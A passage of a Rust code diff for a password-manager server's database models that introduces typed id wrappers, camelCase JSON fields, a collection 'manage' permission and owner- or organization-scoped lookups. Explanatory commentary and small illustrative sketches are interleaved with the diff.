if let Some(days_to_retain) = CONFIG.events_days_retain() {
|
if let Some(days_to_retain) = CONFIG.events_days_retain() {
|
||||||
let dt = Utc::now().naive_utc() - Duration::days(days_to_retain);
|
let dt = Utc::now().naive_utc() - TimeDelta::try_days(days_to_retain).unwrap();
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
diesel::delete(event::table.filter(event::event_date.lt(dt)))
|
diesel::delete(event::table.filter(event::event_date.lt(dt)))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
@@ -327,3 +342,6 @@ impl Event {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#[derive(Clone, Debug, DieselNewType, FromForm, Hash, PartialEq, Eq, Serialize, Deserialize)]
|
||||||
|
pub struct EventId(String);
|
||||||
|
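One behavioral detail in `clean_events`: chrono deprecated its panicking `Duration::days` constructor, and the diff switches to `TimeDelta::try_days`, which returns an `Option` instead of aborting inside the library. A small self-contained sketch of the retention-cutoff computation; the config value here is a local stand-in for `CONFIG.events_days_retain()`:

```rust
// Sketch of the retention-cutoff computation after the chrono change.
use chrono::{TimeDelta, Utc};

fn main() {
    let days_to_retain: i64 = 30; // stand-in for CONFIG.events_days_retain()

    // TimeDelta::try_days returns None if the value would overflow, instead of
    // panicking inside chrono like the deprecated Duration::days constructor.
    let retention = TimeDelta::try_days(days_to_retain).expect("retention period out of range");
    let cutoff = Utc::now().naive_utc() - retention;

    println!("deleting events older than {cutoff}");
}
```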
--- a/src/db/models/favorite.rs
+++ b/src/db/models/favorite.rs
@@ -1,12 +1,12 @@
-use super::User;
+use super::{CipherId, User, UserId};

 db_object! {
     #[derive(Identifiable, Queryable, Insertable)]
     #[diesel(table_name = favorites)]
     #[diesel(primary_key(user_uuid, cipher_uuid))]
     pub struct Favorite {
-        pub user_uuid: String,
-        pub cipher_uuid: String,
+        pub user_uuid: UserId,
+        pub cipher_uuid: CipherId,
     }
 }

@@ -17,7 +17,7 @@ use crate::error::MapResult;

 impl Favorite {
     // Returns whether the specified cipher is a favorite of the specified user.
-    pub async fn is_favorite(cipher_uuid: &str, user_uuid: &str, conn: &mut DbConn) -> bool {
+    pub async fn is_favorite(cipher_uuid: &CipherId, user_uuid: &UserId, conn: &mut DbConn) -> bool {
         db_run! { conn: {
             let query = favorites::table
                 .filter(favorites::cipher_uuid.eq(cipher_uuid))
@@ -29,7 +29,12 @@ impl Favorite {
     }

     // Sets whether the specified cipher is a favorite of the specified user.
-    pub async fn set_favorite(favorite: bool, cipher_uuid: &str, user_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn set_favorite(
+        favorite: bool,
+        cipher_uuid: &CipherId,
+        user_uuid: &UserId,
+        conn: &mut DbConn,
+    ) -> EmptyResult {
         let (old, new) = (Self::is_favorite(cipher_uuid, user_uuid, conn).await, favorite);
         match (old, new) {
             (false, true) => {
@@ -62,7 +67,7 @@ impl Favorite {
     }

     // Delete all favorite entries associated with the specified cipher.
-    pub async fn delete_all_by_cipher(cipher_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn delete_all_by_cipher(cipher_uuid: &CipherId, conn: &mut DbConn) -> EmptyResult {
         db_run! { conn: {
             diesel::delete(favorites::table.filter(favorites::cipher_uuid.eq(cipher_uuid)))
                 .execute(conn)
@@ -71,7 +76,7 @@ impl Favorite {
     }

     // Delete all favorite entries associated with the specified user.
-    pub async fn delete_all_by_user(user_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn delete_all_by_user(user_uuid: &UserId, conn: &mut DbConn) -> EmptyResult {
         db_run! { conn: {
             diesel::delete(favorites::table.filter(favorites::user_uuid.eq(user_uuid)))
                 .execute(conn)
@@ -81,12 +86,12 @@ impl Favorite {

     /// Return a vec with (cipher_uuid) this will only contain favorite flagged ciphers
     /// This is used during a full sync so we only need one query for all favorite cipher matches.
-    pub async fn get_all_cipher_uuid_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<String> {
+    pub async fn get_all_cipher_uuid_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<CipherId> {
         db_run! { conn: {
             favorites::table
                 .filter(favorites::user_uuid.eq(user_uuid))
                 .select(favorites::cipher_uuid)
-                .load::<String>(conn)
+                .load::<CipherId>(conn)
                 .unwrap_or_default()
         }}
     }
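`set_favorite` first reads the current state and only writes on an actual transition, so repeated "favorite" clicks are idempotent. A dependency-free sketch of the same `(old, new)` match:

```rust
// Dependency-free sketch of set_favorite's (old, new) transition table:
// only a real state change issues a write; (false, false) and (true, true) are no-ops.
#[derive(Debug)]
enum Action {
    Insert, // favorites row created
    Delete, // favorites row removed
    None,   // nothing to do
}

fn plan(currently_favorite: bool, requested: bool) -> Action {
    match (currently_favorite, requested) {
        (false, true) => Action::Insert,
        (true, false) => Action::Delete,
        _ => Action::None,
    }
}

fn main() {
    assert!(matches!(plan(false, true), Action::Insert));
    assert!(matches!(plan(true, false), Action::Delete));
    assert!(matches!(plan(true, true), Action::None));
    println!("{:?}", plan(false, false)); // None
}
```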
--- a/src/db/models/folder.rs
+++ b/src/db/models/folder.rs
@@ -1,17 +1,19 @@
 use chrono::{NaiveDateTime, Utc};
+use derive_more::{AsRef, Deref, Display, From};
 use serde_json::Value;

-use super::User;
+use super::{CipherId, User, UserId};
+use macros::UuidFromParam;

 db_object! {
     #[derive(Identifiable, Queryable, Insertable, AsChangeset)]
     #[diesel(table_name = folders)]
     #[diesel(primary_key(uuid))]
     pub struct Folder {
-        pub uuid: String,
+        pub uuid: FolderId,
         pub created_at: NaiveDateTime,
         pub updated_at: NaiveDateTime,
-        pub user_uuid: String,
+        pub user_uuid: UserId,
         pub name: String,
     }

@@ -19,18 +21,18 @@ db_object! {
     #[diesel(table_name = folders_ciphers)]
     #[diesel(primary_key(cipher_uuid, folder_uuid))]
     pub struct FolderCipher {
-        pub cipher_uuid: String,
-        pub folder_uuid: String,
+        pub cipher_uuid: CipherId,
+        pub folder_uuid: FolderId,
     }
 }

 /// Local methods
 impl Folder {
-    pub fn new(user_uuid: String, name: String) -> Self {
+    pub fn new(user_uuid: UserId, name: String) -> Self {
         let now = Utc::now().naive_utc();

         Self {
-            uuid: crate::util::get_uuid(),
+            uuid: FolderId(crate::util::get_uuid()),
             created_at: now,
             updated_at: now,

@@ -43,19 +45,19 @@ impl Folder {
         use crate::util::format_date;

         json!({
-            "Id": self.uuid,
-            "RevisionDate": format_date(&self.updated_at),
-            "Name": self.name,
-            "Object": "folder",
+            "id": self.uuid,
+            "revisionDate": format_date(&self.updated_at),
+            "name": self.name,
+            "object": "folder",
         })
     }
 }

 impl FolderCipher {
-    pub fn new(folder_uuid: &str, cipher_uuid: &str) -> Self {
+    pub fn new(folder_uuid: FolderId, cipher_uuid: CipherId) -> Self {
         Self {
-            folder_uuid: folder_uuid.to_string(),
-            cipher_uuid: cipher_uuid.to_string(),
+            folder_uuid,
+            cipher_uuid,
         }
     }
 }
@@ -113,24 +115,25 @@ impl Folder {
         }}
     }

-    pub async fn delete_all_by_user(user_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn delete_all_by_user(user_uuid: &UserId, conn: &mut DbConn) -> EmptyResult {
         for folder in Self::find_by_user(user_uuid, conn).await {
             folder.delete(conn).await?;
         }
         Ok(())
     }

-    pub async fn find_by_uuid(uuid: &str, conn: &mut DbConn) -> Option<Self> {
+    pub async fn find_by_uuid_and_user(uuid: &FolderId, user_uuid: &UserId, conn: &mut DbConn) -> Option<Self> {
         db_run! { conn: {
             folders::table
                 .filter(folders::uuid.eq(uuid))
+                .filter(folders::user_uuid.eq(user_uuid))
                 .first::<FolderDb>(conn)
                 .ok()
                 .from_db()
         }}
     }

-    pub async fn find_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
         db_run! { conn: {
             folders::table
                 .filter(folders::user_uuid.eq(user_uuid))
@@ -176,7 +179,7 @@ impl FolderCipher {
         }}
     }

-    pub async fn delete_all_by_cipher(cipher_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn delete_all_by_cipher(cipher_uuid: &CipherId, conn: &mut DbConn) -> EmptyResult {
         db_run! { conn: {
             diesel::delete(folders_ciphers::table.filter(folders_ciphers::cipher_uuid.eq(cipher_uuid)))
                 .execute(conn)
@@ -184,7 +187,7 @@ impl FolderCipher {
         }}
     }

-    pub async fn delete_all_by_folder(folder_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn delete_all_by_folder(folder_uuid: &FolderId, conn: &mut DbConn) -> EmptyResult {
         db_run! { conn: {
             diesel::delete(folders_ciphers::table.filter(folders_ciphers::folder_uuid.eq(folder_uuid)))
                 .execute(conn)
@@ -192,7 +195,11 @@ impl FolderCipher {
         }}
     }

-    pub async fn find_by_folder_and_cipher(folder_uuid: &str, cipher_uuid: &str, conn: &mut DbConn) -> Option<Self> {
+    pub async fn find_by_folder_and_cipher(
+        folder_uuid: &FolderId,
+        cipher_uuid: &CipherId,
+        conn: &mut DbConn,
+    ) -> Option<Self> {
         db_run! { conn: {
             folders_ciphers::table
                 .filter(folders_ciphers::folder_uuid.eq(folder_uuid))
@@ -203,7 +210,7 @@ impl FolderCipher {
         }}
     }

-    pub async fn find_by_folder(folder_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_by_folder(folder_uuid: &FolderId, conn: &mut DbConn) -> Vec<Self> {
         db_run! { conn: {
             folders_ciphers::table
                 .filter(folders_ciphers::folder_uuid.eq(folder_uuid))
@@ -215,14 +222,32 @@ impl FolderCipher {

     /// Return a vec with (cipher_uuid, folder_uuid)
     /// This is used during a full sync so we only need one query for all folder matches.
-    pub async fn find_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<(String, String)> {
+    pub async fn find_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<(CipherId, FolderId)> {
         db_run! { conn: {
             folders_ciphers::table
                 .inner_join(folders::table)
                 .filter(folders::user_uuid.eq(user_uuid))
                 .select(folders_ciphers::all_columns)
-                .load::<(String, String)>(conn)
+                .load::<(CipherId, FolderId)>(conn)
                 .unwrap_or_default()
         }}
     }
 }
+
+#[derive(
+    Clone,
+    Debug,
+    AsRef,
+    Deref,
+    DieselNewType,
+    Display,
+    From,
+    FromForm,
+    Hash,
+    PartialEq,
+    Eq,
+    Serialize,
+    Deserialize,
+    UuidFromParam,
+)]
+pub struct FolderId(String);
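The rename from `find_by_uuid` to `find_by_uuid_and_user` is more than cosmetic: the added filter means a folder can only be resolved by its owner, closing the door on cross-user id guessing. A sketch of the same check over an in-memory Vec, since the real version runs inside the `db_run!` macro; all names here are illustrative:

```rust
// Sketch of the owner-scoped lookup that find_by_uuid_and_user introduces.
#[derive(Debug)]
struct Folder {
    uuid: String,
    user_uuid: String,
    name: String,
}

// Both the id *and* the requesting user must match, mirroring the added
// .filter(folders::user_uuid.eq(user_uuid)) clause in the diff.
fn find_by_uuid_and_user<'a>(folders: &'a [Folder], uuid: &str, user_uuid: &str) -> Option<&'a Folder> {
    folders.iter().find(|f| f.uuid == uuid && f.user_uuid == user_uuid)
}

fn main() {
    let folders = vec![Folder {
        uuid: "f1".into(),
        user_uuid: "alice".into(),
        name: "Work".into(),
    }];
    match find_by_uuid_and_user(&folders, "f1", "alice") {
        Some(f) => println!("owner lookup succeeded: {}", f.name),
        None => unreachable!(),
    }
    // A different user cannot resolve the same folder id.
    assert!(find_by_uuid_and_user(&folders, "f1", "mallory").is_none());
}
```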
--- a/src/db/models/group.rs
+++ b/src/db/models/group.rs
@@ -1,13 +1,20 @@
+use super::{CollectionId, Membership, MembershipId, OrganizationId, User, UserId};
+use crate::api::EmptyResult;
+use crate::db::DbConn;
+use crate::error::MapResult;
 use chrono::{NaiveDateTime, Utc};
+use derive_more::{AsRef, Deref, Display, From};
+use macros::UuidFromParam;
 use serde_json::Value;

 db_object! {
     #[derive(Identifiable, Queryable, Insertable, AsChangeset)]
     #[diesel(table_name = groups)]
+    #[diesel(treat_none_as_null = true)]
     #[diesel(primary_key(uuid))]
     pub struct Group {
-        pub uuid: String,
-        pub organizations_uuid: String,
+        pub uuid: GroupId,
+        pub organizations_uuid: OrganizationId,
         pub name: String,
         pub access_all: bool,
         pub external_id: Option<String>,
@@ -19,28 +26,34 @@ db_object! {
     #[diesel(table_name = collections_groups)]
     #[diesel(primary_key(collections_uuid, groups_uuid))]
     pub struct CollectionGroup {
-        pub collections_uuid: String,
-        pub groups_uuid: String,
+        pub collections_uuid: CollectionId,
+        pub groups_uuid: GroupId,
         pub read_only: bool,
         pub hide_passwords: bool,
+        pub manage: bool,
     }

     #[derive(Identifiable, Queryable, Insertable)]
     #[diesel(table_name = groups_users)]
     #[diesel(primary_key(groups_uuid, users_organizations_uuid))]
     pub struct GroupUser {
-        pub groups_uuid: String,
-        pub users_organizations_uuid: String
+        pub groups_uuid: GroupId,
+        pub users_organizations_uuid: MembershipId
     }
 }

 /// Local methods
 impl Group {
-    pub fn new(organizations_uuid: String, name: String, access_all: bool, external_id: Option<String>) -> Self {
+    pub fn new(
+        organizations_uuid: OrganizationId,
+        name: String,
+        access_all: bool,
+        external_id: Option<String>,
+    ) -> Self {
         let now = Utc::now().naive_utc();

         let mut new_model = Self {
-            uuid: crate::util::get_uuid(),
+            uuid: GroupId(crate::util::get_uuid()),
             organizations_uuid,
             name,
             access_all,
@@ -55,41 +68,40 @@ impl Group {
     }

     pub fn to_json(&self) -> Value {
-        use crate::util::format_date;
-
         json!({
-            "Id": self.uuid,
-            "OrganizationId": self.organizations_uuid,
-            "Name": self.name,
-            "AccessAll": self.access_all,
-            "ExternalId": self.external_id,
-            "CreationDate": format_date(&self.creation_date),
-            "RevisionDate": format_date(&self.revision_date),
-            "Object": "group"
+            "id": self.uuid,
+            "organizationId": self.organizations_uuid,
+            "name": self.name,
+            "externalId": self.external_id,
+            "object": "group"
         })
     }

     pub async fn to_json_details(&self, conn: &mut DbConn) -> Value {
+        // If both read_only and hide_passwords are false, then manage should be true
+        // You can't have an entry with read_only and manage, or hide_passwords and manage
+        // Or an entry with everything to false
         let collections_groups: Vec<Value> = CollectionGroup::find_by_group(&self.uuid, conn)
             .await
             .iter()
             .map(|entry| {
                 json!({
-                    "Id": entry.collections_uuid,
-                    "ReadOnly": entry.read_only,
-                    "HidePasswords": entry.hide_passwords
+                    "id": entry.collections_uuid,
+                    "readOnly": entry.read_only,
+                    "hidePasswords": entry.hide_passwords,
+                    "manage": entry.manage,
                 })
             })
             .collect();

         json!({
-            "Id": self.uuid,
-            "OrganizationId": self.organizations_uuid,
-            "Name": self.name,
-            "AccessAll": self.access_all,
-            "ExternalId": self.external_id,
-            "Collections": collections_groups,
-            "Object": "groupDetails"
+            "id": self.uuid,
+            "organizationId": self.organizations_uuid,
+            "name": self.name,
+            "accessAll": self.access_all,
+            "externalId": self.external_id,
+            "collections": collections_groups,
+            "object": "groupDetails"
         })
     }

@@ -103,18 +115,38 @@ impl Group {
 }

 impl CollectionGroup {
-    pub fn new(collections_uuid: String, groups_uuid: String, read_only: bool, hide_passwords: bool) -> Self {
+    pub fn new(
+        collections_uuid: CollectionId,
+        groups_uuid: GroupId,
+        read_only: bool,
+        hide_passwords: bool,
+        manage: bool,
+    ) -> Self {
         Self {
             collections_uuid,
             groups_uuid,
             read_only,
             hide_passwords,
+            manage,
         }
     }

+    pub fn to_json_details_for_group(&self) -> Value {
+        // If both read_only and hide_passwords are false, then manage should be true
+        // You can't have an entry with read_only and manage, or hide_passwords and manage
+        // Or an entry with everything to false
+        // For backwards compatibility and migration purposes we keep checking read_only and hide_passwords
+        json!({
+            "id": self.groups_uuid,
+            "readOnly": self.read_only,
+            "hidePasswords": self.hide_passwords,
+            "manage": self.manage || (!self.read_only && !self.hide_passwords),
+        })
+    }
 }

 impl GroupUser {
-    pub fn new(groups_uuid: String, users_organizations_uuid: String) -> Self {
+    pub fn new(groups_uuid: GroupId, users_organizations_uuid: MembershipId) -> Self {
         Self {
             groups_uuid,
             users_organizations_uuid,
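The comments in `to_json_details_for_group` describe how the `manage` flag is derived for rows that predate the `manage` column: an explicit `manage` wins, and otherwise a row with neither `read_only` nor `hide_passwords` set is promoted to manage. The rule as a checkable truth table:

```rust
// Truth-table sketch of the manage fallback in to_json_details_for_group:
// rows migrated from before the `manage` column default to manage only when
// neither read_only nor hide_passwords is set.
fn effective_manage(manage: bool, read_only: bool, hide_passwords: bool) -> bool {
    manage || (!read_only && !hide_passwords)
}

fn main() {
    // (manage, read_only, hide_passwords) -> effective manage
    assert!(effective_manage(true, true, false)); // explicit manage always wins
    assert!(effective_manage(false, false, false)); // legacy "all false" row => manage
    assert!(!effective_manage(false, true, false)); // read-only row stays read-only
    assert!(!effective_manage(false, false, true)); // hidden-passwords row stays restricted
    println!("manage fallback behaves as expected");
}
```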
@@ -122,13 +154,6 @@ impl GroupUser {
     }
 }

-use crate::db::DbConn;
-
-use crate::api::EmptyResult;
-use crate::error::MapResult;
-
-use super::{User, UserOrganization};
-
 /// Database methods
 impl Group {
     pub async fn save(&mut self, conn: &mut DbConn) -> EmptyResult {
@@ -165,27 +190,27 @@ impl Group {
         }
     }

-    pub async fn delete_all_by_organization(org_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn delete_all_by_organization(org_uuid: &OrganizationId, conn: &mut DbConn) -> EmptyResult {
         for group in Self::find_by_organization(org_uuid, conn).await {
             group.delete(conn).await?;
         }
         Ok(())
     }

-    pub async fn find_by_organization(organizations_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_by_organization(org_uuid: &OrganizationId, conn: &mut DbConn) -> Vec<Self> {
         db_run! { conn: {
             groups::table
-                .filter(groups::organizations_uuid.eq(organizations_uuid))
+                .filter(groups::organizations_uuid.eq(org_uuid))
                 .load::<GroupDb>(conn)
                 .expect("Error loading groups")
                 .from_db()
         }}
     }

-    pub async fn count_by_org(organizations_uuid: &str, conn: &mut DbConn) -> i64 {
+    pub async fn count_by_org(org_uuid: &OrganizationId, conn: &mut DbConn) -> i64 {
         db_run! { conn: {
             groups::table
-                .filter(groups::organizations_uuid.eq(organizations_uuid))
+                .filter(groups::organizations_uuid.eq(org_uuid))
                 .count()
                 .first::<i64>(conn)
                 .ok()
@@ -193,27 +218,33 @@ impl Group {
         }}
     }

-    pub async fn find_by_uuid(uuid: &str, conn: &mut DbConn) -> Option<Self> {
+    pub async fn find_by_uuid_and_org(uuid: &GroupId, org_uuid: &OrganizationId, conn: &mut DbConn) -> Option<Self> {
         db_run! { conn: {
             groups::table
                 .filter(groups::uuid.eq(uuid))
+                .filter(groups::organizations_uuid.eq(org_uuid))
                 .first::<GroupDb>(conn)
                 .ok()
                 .from_db()
         }}
     }

-    pub async fn find_by_external_id(id: &str, conn: &mut DbConn) -> Option<Self> {
+    pub async fn find_by_external_id_and_org(
+        external_id: &str,
+        org_uuid: &OrganizationId,
+        conn: &mut DbConn,
+    ) -> Option<Self> {
         db_run! { conn: {
             groups::table
-                .filter(groups::external_id.eq(id))
+                .filter(groups::external_id.eq(external_id))
+                .filter(groups::organizations_uuid.eq(org_uuid))
                 .first::<GroupDb>(conn)
                 .ok()
                 .from_db()
         }}
     }
     //Returns all organizations the user has full access to
-    pub async fn gather_user_organizations_full_access(user_uuid: &str, conn: &mut DbConn) -> Vec<String> {
+    pub async fn get_orgs_by_user_with_full_access(user_uuid: &UserId, conn: &mut DbConn) -> Vec<OrganizationId> {
         db_run! { conn: {
             groups_users::table
                 .inner_join(users_organizations::table.on(
@@ -226,12 +257,12 @@ impl Group {
                 .filter(groups::access_all.eq(true))
                 .select(groups::organizations_uuid)
                 .distinct()
-                .load::<String>(conn)
+                .load::<OrganizationId>(conn)
                 .expect("Error loading organization group full access information for user")
         }}
     }

-    pub async fn is_in_full_access_group(user_uuid: &str, org_uuid: &str, conn: &mut DbConn) -> bool {
+    pub async fn is_in_full_access_group(user_uuid: &UserId, org_uuid: &OrganizationId, conn: &mut DbConn) -> bool {
         db_run! { conn: {
             groups::table
                 .inner_join(groups_users::table.on(
@@ -260,13 +291,13 @@ impl Group {
         }}
     }

-    pub async fn update_revision(uuid: &str, conn: &mut DbConn) {
+    pub async fn update_revision(uuid: &GroupId, conn: &mut DbConn) {
         if let Err(e) = Self::_update_revision(uuid, &Utc::now().naive_utc(), conn).await {
-            warn!("Failed to update revision for {}: {:#?}", uuid, e);
+            warn!("Failed to update revision for {uuid}: {e:#?}");
         }
     }

-    async fn _update_revision(uuid: &str, date: &NaiveDateTime, conn: &mut DbConn) -> EmptyResult {
+    async fn _update_revision(uuid: &GroupId, date: &NaiveDateTime, conn: &mut DbConn) -> EmptyResult {
         db_run! {conn: {
             crate::util::retry(|| {
                 diesel::update(groups::table.filter(groups::uuid.eq(uuid)))
@@ -293,6 +324,7 @@ impl CollectionGroup {
                     collections_groups::groups_uuid.eq(&self.groups_uuid),
                     collections_groups::read_only.eq(&self.read_only),
                     collections_groups::hide_passwords.eq(&self.hide_passwords),
+                    collections_groups::manage.eq(&self.manage),
                 ))
                 .execute(conn)
                 {
@@ -307,6 +339,7 @@ impl CollectionGroup {
                     collections_groups::groups_uuid.eq(&self.groups_uuid),
                     collections_groups::read_only.eq(&self.read_only),
                     collections_groups::hide_passwords.eq(&self.hide_passwords),
+                    collections_groups::manage.eq(&self.manage),
                 ))
                 .execute(conn)
                 .map_res("Error adding group to collection")
@@ -321,12 +354,14 @@ impl CollectionGroup {
                     collections_groups::groups_uuid.eq(&self.groups_uuid),
                     collections_groups::read_only.eq(self.read_only),
                     collections_groups::hide_passwords.eq(self.hide_passwords),
+                    collections_groups::manage.eq(self.manage),
                 ))
                 .on_conflict((collections_groups::collections_uuid, collections_groups::groups_uuid))
                 .do_update()
                 .set((
                     collections_groups::read_only.eq(self.read_only),
                     collections_groups::hide_passwords.eq(self.hide_passwords),
+                    collections_groups::manage.eq(self.manage),
                 ))
                 .execute(conn)
                 .map_res("Error adding group to collection")
@@ -334,7 +369,7 @@ impl CollectionGroup {
         }
     }

-    pub async fn find_by_group(group_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_by_group(group_uuid: &GroupId, conn: &mut DbConn) -> Vec<Self> {
         db_run! { conn: {
             collections_groups::table
                 .filter(collections_groups::groups_uuid.eq(group_uuid))
@@ -344,7 +379,7 @@ impl CollectionGroup {
         }}
     }

-    pub async fn find_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
         db_run! { conn: {
             collections_groups::table
                 .inner_join(groups_users::table.on(
@@ -361,7 +396,7 @@ impl CollectionGroup {
         }}
     }

-    pub async fn find_by_collection(collection_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_by_collection(collection_uuid: &CollectionId, conn: &mut DbConn) -> Vec<Self> {
         db_run! { conn: {
             collections_groups::table
                 .filter(collections_groups::collections_uuid.eq(collection_uuid))
@@ -387,7 +422,7 @@ impl CollectionGroup {
         }}
     }

-    pub async fn delete_all_by_group(group_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn delete_all_by_group(group_uuid: &GroupId, conn: &mut DbConn) -> EmptyResult {
         let group_users = GroupUser::find_by_group(group_uuid, conn).await;
         for group_user in group_users {
             group_user.update_user_revision(conn).await;
@@ -401,7 +436,7 @@ impl CollectionGroup {
         }}
     }

-    pub async fn delete_all_by_collection(collection_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn delete_all_by_collection(collection_uuid: &CollectionId, conn: &mut DbConn) -> EmptyResult {
         let collection_assigned_to_groups = CollectionGroup::find_by_collection(collection_uuid, conn).await;
         for collection_assigned_to_group in collection_assigned_to_groups {
             let group_users = GroupUser::find_by_group(&collection_assigned_to_group.groups_uuid, conn).await;
@@ -466,7 +501,7 @@ impl GroupUser {
         }
     }

-    pub async fn find_by_group(group_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_by_group(group_uuid: &GroupId, conn: &mut DbConn) -> Vec<Self> {
         db_run! { conn: {
             groups_users::table
                 .filter(groups_users::groups_uuid.eq(group_uuid))
@@ -476,43 +511,80 @@ impl GroupUser {
         }}
     }

-    pub async fn find_by_user(users_organizations_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_by_member(member_uuid: &MembershipId, conn: &mut DbConn) -> Vec<Self> {
         db_run! { conn: {
             groups_users::table
-                .filter(groups_users::users_organizations_uuid.eq(users_organizations_uuid))
+                .filter(groups_users::users_organizations_uuid.eq(member_uuid))
                 .load::<GroupUserDb>(conn)
                 .expect("Error loading groups for user")
                 .from_db()
         }}
     }

+    pub async fn has_access_to_collection_by_member(
+        collection_uuid: &CollectionId,
+        member_uuid: &MembershipId,
+        conn: &mut DbConn,
+    ) -> bool {
+        db_run! { conn: {
+            groups_users::table
+                .inner_join(collections_groups::table.on(
+                    collections_groups::groups_uuid.eq(groups_users::groups_uuid)
+                ))
+                .filter(collections_groups::collections_uuid.eq(collection_uuid))
+                .filter(groups_users::users_organizations_uuid.eq(member_uuid))
+                .count()
+                .first::<i64>(conn)
+                .unwrap_or(0) != 0
+        }}
+    }
+
+    pub async fn has_full_access_by_member(
+        org_uuid: &OrganizationId,
+        member_uuid: &MembershipId,
+        conn: &mut DbConn,
+    ) -> bool {
+        db_run! { conn: {
+            groups_users::table
+                .inner_join(groups::table.on(
+                    groups::uuid.eq(groups_users::groups_uuid)
+                ))
+                .filter(groups::organizations_uuid.eq(org_uuid))
+                .filter(groups::access_all.eq(true))
+                .filter(groups_users::users_organizations_uuid.eq(member_uuid))
+                .count()
+                .first::<i64>(conn)
+                .unwrap_or(0) != 0
+        }}
+    }
+
     pub async fn update_user_revision(&self, conn: &mut DbConn) {
-        match UserOrganization::find_by_uuid(&self.users_organizations_uuid, conn).await {
-            Some(user) => User::update_uuid_revision(&user.user_uuid, conn).await,
-            None => warn!("User could not be found!"),
+        match Membership::find_by_uuid(&self.users_organizations_uuid, conn).await {
+            Some(member) => User::update_uuid_revision(&member.user_uuid, conn).await,
+            None => warn!("Member could not be found!"),
         }
     }

-    pub async fn delete_by_group_id_and_user_id(
-        group_uuid: &str,
-        users_organizations_uuid: &str,
+    pub async fn delete_by_group_and_member(
+        group_uuid: &GroupId,
+        member_uuid: &MembershipId,
         conn: &mut DbConn,
     ) -> EmptyResult {
-        match UserOrganization::find_by_uuid(users_organizations_uuid, conn).await {
-            Some(user) => User::update_uuid_revision(&user.user_uuid, conn).await,
-            None => warn!("User could not be found!"),
+        match Membership::find_by_uuid(member_uuid, conn).await {
+            Some(member) => User::update_uuid_revision(&member.user_uuid, conn).await,
+            None => warn!("Member could not be found!"),
         };

         db_run! { conn: {
             diesel::delete(groups_users::table)
                 .filter(groups_users::groups_uuid.eq(group_uuid))
-                .filter(groups_users::users_organizations_uuid.eq(users_organizations_uuid))
+                .filter(groups_users::users_organizations_uuid.eq(member_uuid))
                 .execute(conn)
                 .map_res("Error deleting group users")
         }}
     }

-    pub async fn delete_all_by_group(group_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn delete_all_by_group(group_uuid: &GroupId, conn: &mut DbConn) -> EmptyResult {
         let group_users = GroupUser::find_by_group(group_uuid, conn).await;
         for group_user in group_users {
             group_user.update_user_revision(conn).await;
@@ -526,17 +598,35 @@ impl GroupUser {
         }}
     }

-    pub async fn delete_all_by_user(users_organizations_uuid: &str, conn: &mut DbConn) -> EmptyResult {
-        match UserOrganization::find_by_uuid(users_organizations_uuid, conn).await {
-            Some(user) => User::update_uuid_revision(&user.user_uuid, conn).await,
-            None => warn!("User could not be found!"),
+    pub async fn delete_all_by_member(member_uuid: &MembershipId, conn: &mut DbConn) -> EmptyResult {
+        match Membership::find_by_uuid(member_uuid, conn).await {
+            Some(member) => User::update_uuid_revision(&member.user_uuid, conn).await,
+            None => warn!("Member could not be found!"),
         }

         db_run! { conn: {
             diesel::delete(groups_users::table)
-                .filter(groups_users::users_organizations_uuid.eq(users_organizations_uuid))
+                .filter(groups_users::users_organizations_uuid.eq(member_uuid))
                 .execute(conn)
                 .map_res("Error deleting user groups")
         }}
     }
 }

+#[derive(
+    Clone,
+    Debug,
+    AsRef,
+    Deref,
+    DieselNewType,
+    Display,
+    From,
+    FromForm,
+    Hash,
+    PartialEq,
+    Eq,
+    Serialize,
+    Deserialize,
+    UuidFromParam,
+)]
+pub struct GroupId(String);
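The new `has_access_to_collection_by_member` and `has_full_access_by_member` helpers both answer a yes/no question by joining, counting, and comparing the count to zero. A sketch of the same shape over in-memory slices, with the diesel `inner_join` replaced by an iterator "join"; the structs and data are made up for illustration:

```rust
// Sketch of the existence check used by has_access_to_collection_by_member:
// "join" groups_users with collections_groups on the group id, then count.
struct GroupUser {
    group: &'static str,
    member: &'static str,
}

struct CollectionGroup {
    collection: &'static str,
    group: &'static str,
}

fn has_access(member: &str, collection: &str, gu: &[GroupUser], cg: &[CollectionGroup]) -> bool {
    let matches = gu
        .iter()
        .filter(|g| g.member == member)
        .flat_map(|g| cg.iter().filter(move |c| c.group == g.group))
        .filter(|c| c.collection == collection)
        .count();
    // Mirrors the diff's .count().first::<i64>(conn).unwrap_or(0) != 0 idiom.
    matches != 0
}

fn main() {
    let gu = [GroupUser { group: "dev", member: "m1" }];
    let cg = [CollectionGroup { collection: "secrets", group: "dev" }];
    assert!(has_access("m1", "secrets", &gu, &cg));
    assert!(!has_access("m2", "secrets", &gu, &cg));
}
```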
--- a/src/db/models/mod.rs
+++ b/src/db/models/mod.rs
@@ -12,22 +12,30 @@ mod org_policy;
